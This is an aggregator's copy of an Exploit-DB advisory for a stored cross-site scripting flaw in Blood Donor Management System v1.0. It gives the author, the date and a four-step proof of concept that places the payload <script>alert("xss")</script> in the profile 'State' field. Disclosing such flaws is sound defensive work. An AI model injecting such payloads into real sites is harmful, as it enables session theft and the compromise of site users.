3
[webapps] Blood Donor Management System v1.0 - Stored XSS
source link: https://www.exploit-db.com/exploits/51697
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Blood Donor Management System v1.0 - Stored XSS
EDB-ID:
51697
EDB Verified:
# Exploit Title: Blood Donor Management System v1.0 - Stored XSS
# Application: Blood Donor Management System
# Version: v1.0
# Bugs: Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/
# Date: 15.08.2023
# Author: Ehlullah Albayrak
# Tested on: Windows
#POC
========================================
1. Login to user account
2. Go to Profile
3. Change "State" input and add "<script>alert("xss")</script>" payload.
4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered.
#Payload: <script>alert("xss")</script>
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK